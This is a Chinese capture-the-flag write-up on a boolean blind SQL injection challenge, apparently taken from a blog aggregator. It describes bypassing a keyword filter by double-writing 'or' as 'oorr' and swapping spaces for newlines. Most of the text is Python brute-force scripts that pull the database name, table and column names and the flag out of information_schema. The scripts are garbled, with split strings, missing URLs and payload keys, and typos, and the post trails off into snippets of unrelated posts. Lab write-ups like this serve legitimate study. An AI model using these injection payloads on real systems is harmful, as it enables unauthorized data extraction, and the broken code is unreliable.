題目是乙個比較簡單的bool盲注題目,沒有錯誤回顯,只有you are in ,you are not in 和waf的注入提醒。我用burp模糊測試了一下
發現過濾了空格,union,and,逗號等,但是沒有過濾or,所以我們來用or試試看把。發現仍是you are not in.這是為什麼?明明沒有過濾or,可能是接收時,自動刪除了or,我們可以用大小寫或者雙寫試試。從大佬的wp中看到*貌似也唄後台改變了。因為id=0'oorr'1'='1是you are in 但是id=0'oorr'1'='1/**/,確實you are not in ,因此不能用/**/替代空格
這就說明了我們剛剛的猜測,雙寫或者大寫均可繞過。呢麼之後的爆破,就由我們的指令碼來執行把。附上指令碼:
#資料庫長度
import
requests
url="
"str='
you are in
'for i in range(1,30):
key=
res=requests.post(url,data=key).text
(i)
if str in
res:
print('
length=%s
'%i)
break
#資料庫名
import
requests
str = "
you are in
"url = "
"guess = "
abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&._
"database = ''
print('
start')
for i in range(1,19):
for j in
guess:
key =
res = requests.post(url,data=key).text
print('
............%s......%s.......
'%(i,j))
if str in
res:
database +=j
break
(database)
print("
end!
")
#報表名import
requests
url="
"str="
you are in
"guess="
abcdefghiklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&._
"tables=''
print('
strat')
for i in range(1,15):
for j in
guess:
reg = "
0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0
"%(i,j)
reg=reg.replace('
',chr(0x0a))
key=
r=requests.post(url,data=key).text
(i)
if str in
r: tables +=j
(tables)
break
(talbes)
#報列名import
requests
url="
"str="
you are in
"guess="
abcdefghiklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&._
"columns=''
print('
start')
for i in range(1,15):
for j in
guess:
reg = "
0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0
"%(i,j)
reg=reg.replace('
',chr(0x0a))
key=
r=requests.post(url,data=key).text
(i)
if str in
r: columns +=j
(columns)
break
print(columns)
#最後的-是空格報資料import
requests
url="
"str="
you are in
"guess="
abcdefghiklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&._
"datas=''
print('
start')
for i in range(1,20):
for j in
guess:
reg = "
0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0
"%(i,j)
reg=reg.replace('
',chr(0x0a))
key=
r=requests.post(url,data=key).text
(i)
if str in
r: datas +=j
(datas)
break
print(datas)
id=1'-- 是you are not in
參考了大佬的wp:
CTF實驗吧認真一點 SQL盲注
實驗吧位址 很明顯的返回兩個不同得頁面,判斷為sql盲注 並且 過濾了敏感字元 測試的時候還發現過濾了substr 嘗試繞過,返回錯誤頁面 說明 過濾是可以被繞過的 爆庫名長度 import requests str1 you are in url for i in range 1,30 key r...
sql注入之布林注入 實驗吧 認真一點啊!
原文 先簡單地試試,發現輸入1會回顯you are in,輸入其他會回顯you are not in,而輸入1 也會回顯you are not in,這說明單引號沒有被吃掉,還可以使用。繼續測試發現過濾了and 空格和 or沒有被過濾。構造id 1 or 0a 1或者id 1 or 1,看到的回顯卻...
呵呵,一點感想吧
和很多人一樣,一開始,什麼都碰,什麼都是學了一點就不學了,呵呵,很不專業啊。但又很無奈啊,我很想要乙個環境,乙個有相同喜好的朋友,合作夥伴。但是,很難找啊,傍邊的人不是忙著考試,就是忙著發財啊,呵呵,要不就什麼都是做了,泡妞,上網,玩世不恭,這就是因為我在乙個民辦高校的原因吧,環境,讓我失去了很多,...